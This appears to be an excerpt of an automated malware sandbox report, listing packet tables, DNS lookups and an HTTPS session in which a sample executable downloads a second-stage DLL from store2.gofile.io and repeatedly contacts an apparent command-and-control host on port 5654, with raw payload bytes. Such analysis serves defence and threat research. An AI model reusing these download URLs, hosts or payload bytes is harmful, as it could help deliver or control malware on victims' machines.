Oct 13, 2021 21:03:03.872636080 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.872653008 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.872661114 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.873034000 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.873061895 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.873085022 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.873758078 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.873785973 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.873806953 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874022961 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874030113 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.874154091 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874219894 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.874237061 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.874238968 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874324083 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874356031 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.874402046 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874468088 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874469995 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.874516964 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874572992 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874589920 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.874675989 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874767065 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.874783039 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.874794006 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.875080109 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.890739918 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.891047955 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.891402960 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.891412973 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.891870975 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.892239094 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.892363071 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.892375946 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.892405033 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.892478943 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.892488003 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.892518997 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.892580986 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.892587900 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.892627001 CEST	443	49756	31.14.69.10	192.168.2.7
Oct 13, 2021 21:03:03.893508911 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:03.894634962 CEST	49756	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:03:07.201564074 CEST	49759	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:07.225709915 CEST	5654	49759	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:07.911040068 CEST	49759	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:07.935085058 CEST	5654	49759	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:08.573791981 CEST	49759	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:08.597723961 CEST	5654	49759	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:12.777347088 CEST	49760	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:12.805039883 CEST	5654	49760	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:13.411492109 CEST	49760	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:13.435965061 CEST	5654	49760	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:14.099096060 CEST	49760	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:14.123533010 CEST	5654	49760	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:18.323560953 CEST	49764	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:18.348481894 CEST	5654	49764	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:18.943218946 CEST	49764	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:18.967612982 CEST	5654	49764	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:19.521384954 CEST	49764	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:19.546010971 CEST	5654	49764	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:23.708355904 CEST	49779	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:23.732486963 CEST	5654	49779	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:24.240542889 CEST	49779	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:24.264689922 CEST	5654	49779	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:24.771810055 CEST	49779	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:24.795767069 CEST	5654	49779	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:28.953540087 CEST	49810	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:28.978466034 CEST	5654	49810	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:29.490978956 CEST	49810	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:29.517795086 CEST	5654	49810	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:30.022308111 CEST	49810	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:30.046689034 CEST	5654	49810	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:34.131402016 CEST	49814	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:34.156387091 CEST	5654	49814	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:34.663469076 CEST	49814	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:34.688374996 CEST	5654	49814	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:35.194673061 CEST	49814	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:35.219074965 CEST	5654	49814	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:39.464104891 CEST	49815	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:39.488567114 CEST	5654	49815	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:40.054403067 CEST	49815	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:40.078891039 CEST	5654	49815	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:40.663734913 CEST	49815	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:40.689657927 CEST	5654	49815	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:44.822844982 CEST	49817	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:44.847155094 CEST	5654	49817	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:45.351727962 CEST	49817	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:45.375828981 CEST	5654	49817	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:45.883162022 CEST	49817	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:45.909224033 CEST	5654	49817	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:49.978811979 CEST	49829	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:50.002938986 CEST	5654	49829	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:50.508351088 CEST	49829	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:50.532238007 CEST	5654	49829	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:51.039798021 CEST	49829	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:51.063831091 CEST	5654	49829	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:55.840145111 CEST	49853	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:55.864149094 CEST	5654	49853	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:56.368325949 CEST	49853	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:56.392358065 CEST	5654	49853	91.121.250.249	192.168.2.7
Oct 13, 2021 21:03:56.899630070 CEST	49853	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:03:56.923674107 CEST	5654	49853	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:01.244613886 CEST	49871	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:01.269171953 CEST	5654	49871	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:01.790601015 CEST	49871	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:01.817099094 CEST	5654	49871	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:02.321880102 CEST	49871	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:02.350661039 CEST	5654	49871	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:06.450087070 CEST	49872	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:06.474230051 CEST	5654	49872	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:06.979023933 CEST	49872	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:07.003264904 CEST	5654	49872	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:07.509948015 CEST	49872	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:07.534152985 CEST	5654	49872	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:11.564399958 CEST	49873	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:11.588505983 CEST	5654	49873	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:12.088630915 CEST	49873	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:12.112847090 CEST	5654	49873	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:12.619637012 CEST	49873	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:12.643811941 CEST	5654	49873	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:16.864876032 CEST	49876	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:16.889213085 CEST	5654	49876	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:17.401254892 CEST	49876	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:17.425281048 CEST	5654	49876	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:17.932642937 CEST	49876	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:17.956880093 CEST	5654	49876	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:21.985719919 CEST	49877	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:22.010078907 CEST	5654	49877	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:22.527920961 CEST	49877	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:22.552237988 CEST	5654	49877	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:23.067786932 CEST	49877	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:23.092309952 CEST	5654	49877	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:27.124128103 CEST	49878	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:27.148818016 CEST	5654	49878	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:27.657392979 CEST	49878	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:27.681896925 CEST	5654	49878	91.121.250.249	192.168.2.7
Oct 13, 2021 21:04:28.205916882 CEST	49878	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:04:28.231285095 CEST	5654	49878	91.121.250.249	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 21:02:24.612535954 CEST	61242	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:02:24.630748034 CEST	53	61242	8.8.8.8	192.168.2.7
Oct 13, 2021 21:02:34.187187910 CEST	56590	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:02:34.210506916 CEST	53	56590	8.8.8.8	192.168.2.7
Oct 13, 2021 21:02:39.948121071 CEST	60501	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:02:40.001529932 CEST	53	60501	8.8.8.8	192.168.2.7
Oct 13, 2021 21:02:45.880455017 CEST	53775	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:02:45.903541088 CEST	53	53775	8.8.8.8	192.168.2.7
Oct 13, 2021 21:02:51.042285919 CEST	63668	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:02:51.066339970 CEST	53	63668	8.8.8.8	192.168.2.7
Oct 13, 2021 21:02:53.222882032 CEST	54640	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:02:53.241328001 CEST	53	54640	8.8.8.8	192.168.2.7
Oct 13, 2021 21:02:55.477127075 CEST	58739	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:02:55.495481968 CEST	53	58739	8.8.8.8	192.168.2.7
Oct 13, 2021 21:02:56.288610935 CEST	60338	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:02:56.305104971 CEST	53	60338	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:01.638463020 CEST	58717	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:01.665621042 CEST	53	58717	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:02.567184925 CEST	59762	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:02.597265959 CEST	53	59762	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:07.181483030 CEST	54329	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:07.199901104 CEST	53	54329	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:12.757250071 CEST	58052	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:12.775641918 CEST	53	58052	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:18.186084032 CEST	64569	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:18.204528093 CEST	53	64569	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:23.689912081 CEST	50452	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:23.706641912 CEST	53	50452	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:28.888942957 CEST	64296	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:28.907193899 CEST	53	64296	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:34.103861094 CEST	56680	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:34.130300999 CEST	53	56680	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:39.443249941 CEST	58820	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:39.462678909 CEST	53	58820	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:44.797622919 CEST	60983	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:44.820854902 CEST	53	60983	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:49.958292007 CEST	49247	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:49.976731062 CEST	53	49247	8.8.8.8	192.168.2.7
Oct 13, 2021 21:03:55.820278883 CEST	52286	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:03:55.836883068 CEST	53	52286	8.8.8.8	192.168.2.7
Oct 13, 2021 21:04:01.210704088 CEST	56064	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:04:01.242820978 CEST	53	56064	8.8.8.8	192.168.2.7
Oct 13, 2021 21:04:06.401926041 CEST	63744	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:04:06.420233011 CEST	53	63744	8.8.8.8	192.168.2.7
Oct 13, 2021 21:04:11.545428991 CEST	61457	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:04:11.563745022 CEST	53	61457	8.8.8.8	192.168.2.7
Oct 13, 2021 21:04:16.845597029 CEST	60599	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:04:16.863938093 CEST	53	60599	8.8.8.8	192.168.2.7
Oct 13, 2021 21:04:21.960386038 CEST	59571	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:04:21.984507084 CEST	53	59571	8.8.8.8	192.168.2.7
Oct 13, 2021 21:04:27.102984905 CEST	52689	53	192.168.2.7	8.8.8.8
Oct 13, 2021 21:04:27.121478081 CEST	53	52689	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 21:02:24.612535954 CEST	192.168.2.7	8.8.8.8	0x95e9	Standard query (0)	store2.gofile.io	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:34.187187910 CEST	192.168.2.7	8.8.8.8	0xdc26	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:39.948121071 CEST	192.168.2.7	8.8.8.8	0xfe76	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:45.880455017 CEST	192.168.2.7	8.8.8.8	0x5e68	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:51.042285919 CEST	192.168.2.7	8.8.8.8	0x884e	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:53.222882032 CEST	192.168.2.7	8.8.8.8	0x97df	Standard query (0)	store2.gofile.io	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:55.477127075 CEST	192.168.2.7	8.8.8.8	0xf722	Standard query (0)	store2.gofile.io	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:56.288610935 CEST	192.168.2.7	8.8.8.8	0x2c4a	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:01.638463020 CEST	192.168.2.7	8.8.8.8	0x1cfb	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:02.567184925 CEST	192.168.2.7	8.8.8.8	0x1d61	Standard query (0)	store2.gofile.io	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:07.181483030 CEST	192.168.2.7	8.8.8.8	0x141e	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:12.757250071 CEST	192.168.2.7	8.8.8.8	0xd297	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:18.186084032 CEST	192.168.2.7	8.8.8.8	0x9ad1	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:23.689912081 CEST	192.168.2.7	8.8.8.8	0x6011	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:28.888942957 CEST	192.168.2.7	8.8.8.8	0xa14a	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:34.103861094 CEST	192.168.2.7	8.8.8.8	0x9a8a	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:39.443249941 CEST	192.168.2.7	8.8.8.8	0x5554	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:44.797622919 CEST	192.168.2.7	8.8.8.8	0xf5b8	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:49.958292007 CEST	192.168.2.7	8.8.8.8	0xa30f	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:55.820278883 CEST	192.168.2.7	8.8.8.8	0x5aa5	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:01.210704088 CEST	192.168.2.7	8.8.8.8	0xbbc3	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:06.401926041 CEST	192.168.2.7	8.8.8.8	0x3227	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:11.545428991 CEST	192.168.2.7	8.8.8.8	0x260b	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:16.845597029 CEST	192.168.2.7	8.8.8.8	0x2572	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:21.960386038 CEST	192.168.2.7	8.8.8.8	0x9d84	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:27.102984905 CEST	192.168.2.7	8.8.8.8	0x1b00	Standard query (0)	cloudhost.myfirewall.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Oct 13, 2021 21:02:24.630748034 CEST	8.8.8.8	192.168.2.7	0x95e9	No error (0)	store2.gofile.io	31.14.69.10	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:34.210506916 CEST	8.8.8.8	192.168.2.7	0xdc26	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:40.001529932 CEST	8.8.8.8	192.168.2.7	0xfe76	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:45.903541088 CEST	8.8.8.8	192.168.2.7	0x5e68	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:51.066339970 CEST	8.8.8.8	192.168.2.7	0x884e	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:53.241328001 CEST	8.8.8.8	192.168.2.7	0x97df	No error (0)	store2.gofile.io	31.14.69.10	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:55.495481968 CEST	8.8.8.8	192.168.2.7	0xf722	No error (0)	store2.gofile.io	31.14.69.10	A (IP address)	IN (0x0001)
Oct 13, 2021 21:02:56.305104971 CEST	8.8.8.8	192.168.2.7	0x2c4a	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:01.665621042 CEST	8.8.8.8	192.168.2.7	0x1cfb	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:02.597265959 CEST	8.8.8.8	192.168.2.7	0x1d61	No error (0)	store2.gofile.io	31.14.69.10	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:07.199901104 CEST	8.8.8.8	192.168.2.7	0x141e	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:12.775641918 CEST	8.8.8.8	192.168.2.7	0xd297	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:18.204528093 CEST	8.8.8.8	192.168.2.7	0x9ad1	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:23.706641912 CEST	8.8.8.8	192.168.2.7	0x6011	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:28.907193899 CEST	8.8.8.8	192.168.2.7	0xa14a	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:34.130300999 CEST	8.8.8.8	192.168.2.7	0x9a8a	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:39.462678909 CEST	8.8.8.8	192.168.2.7	0x5554	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:44.820854902 CEST	8.8.8.8	192.168.2.7	0xf5b8	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:49.976731062 CEST	8.8.8.8	192.168.2.7	0xa30f	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:03:55.836883068 CEST	8.8.8.8	192.168.2.7	0x5aa5	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:01.242820978 CEST	8.8.8.8	192.168.2.7	0xbbc3	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:06.420233011 CEST	8.8.8.8	192.168.2.7	0x3227	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:11.563745022 CEST	8.8.8.8	192.168.2.7	0x260b	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:16.863938093 CEST	8.8.8.8	192.168.2.7	0x2572	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:21.984507084 CEST	8.8.8.8	192.168.2.7	0x9d84	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)
Oct 13, 2021 21:04:27.121478081 CEST	8.8.8.8	192.168.2.7	0x1b00	No error (0)	cloudhost.myfirewall.org	91.121.250.249	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

store2.gofile.io

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49743	31.14.69.10	443	C:\Users\user\Desktop\LFEs2N6DU4.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 19:02:25 UTC	0	OUT	GET /download/37b08118-4d43-44c2-b112-31ce77d0b77d/Szxppkyqovxyiyryjhv.dll HTTP/1.1 Host: store2.gofile.io Connection: Keep-Alive
2021-10-13 19:02:25 UTC	0	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Disposition: attachment; filename="Szxppkyqovxyiyryjhv.dll" Content-Length: 542208 Content-Type: application/octet-stream Date: Wed, 13 Oct 2021 19:02:25 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Powered-By: Express X-Xss-Protection: 1; mode=block Connection: close
2021-10-13 19:02:25 UTC	0	IN	Data Raw: 58 44 63 a5 cd 21 cb 11 d6 48 51 27 17 c0 81 52 72 f1 0b a7 eb c9 9b e7 53 a0 0b bd 34 e7 95 e6 86 8c d0 bb 93 4e c6 e8 30 7f f4 db 1e 3e a8 00 52 08 2e 6f 25 a8 e2 27 e5 e3 09 c7 2f 2e 96 77 c6 83 e7 90 50 bf bd 15 99 68 af b5 d9 a5 f8 0a 44 5b 1f 35 36 4d 01 ef eb 11 d9 59 7f ef 20 54 47 c0 27 b9 f8 a0 f0 95 e7 3d cf d0 88 14 40 c6 7b d5 46 fa 4d 76 99 30 2d 0f 80 ab b6 a8 a9 e5 2b 44 d8 67 2e d8 0b 53 4e 2c c9 30 61 2b e3 04 53 5f b4 e8 61 c0 03 43 01 b3 a3 2a 0f a3 a8 48 05 7a 30 27 82 a2 92 eb 3f d8 75 d7 89 99 32 53 75 c9 dd 20 d5 9b f8 ba b3 98 38 e1 0d 2e f7 20 35 54 2e d8 df 9d 29 73 51 77 9f f0 c0 db ef 5f b2 aa ff 47 7f 57 d5 76 be 72 f4 3e c5 c7 dd 3e 49 fb 1e 93 13 c7 c6 f2 74 60 10 38 8a a3 cf 5f e0 a5 42 db a9 b5 69 11 01 92 d7 c9 5a 1a 93 Data Ascii: XDc!HQ'RrS4N0>R.o%'/.wPhD[56MY TG'=@{FMv0-+Dg.SN,0a+S_aC*Hz0'?u2Su 8. 5T.)sQw_GWvr>>It`8_BiZ
